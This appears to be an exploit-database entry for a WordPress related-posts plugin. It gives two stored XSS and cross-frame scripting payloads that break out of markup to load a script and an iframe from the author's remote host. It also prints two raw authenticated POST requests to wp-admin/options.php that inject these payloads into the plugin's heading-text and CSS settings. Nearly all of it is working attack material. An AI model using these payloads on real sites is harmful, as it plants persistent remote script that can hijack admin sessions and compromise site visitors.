Share
## https://sploitus.com/exploit?id=WPEX-ID:2F86E418-22FD-4CB8-8DE1-062B17CF20A7
### -- [ Payloads: ]

[$] m0ze"><script src=//m0ze.ru/payload/a.js></script><div x

[$] m0ze</textarea><iframe src=https://m0ze.ru/payload/xfsii.html></iframe><div x



### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Heading text: ]

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 480

option_page=rp4wp&action=update&_wpnonce=101246c8a1&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=13&rp4wp%5Bheading_text%5D=m0ze%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&rp4wp%5Bexcerpt_length%5D=1337&rp4wp%5Bdisplay_image%5D=1&rp4wp%5Bcss%5D=m0ze%3C%2Ftextarea%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x



### -- [ PoC #2 | Authenticated Persistent XSS & XFS | CSS: ]

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 480

option_page=rp4wp&action=update&_wpnonce=101246c8a1&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=13&rp4wp%5Bheading_text%5D=m0ze%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&rp4wp%5Bexcerpt_length%5D=1337&rp4wp%5Bdisplay_image%5D=1&rp4wp%5Bcss%5D=m0ze%3C%2Ftextarea%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x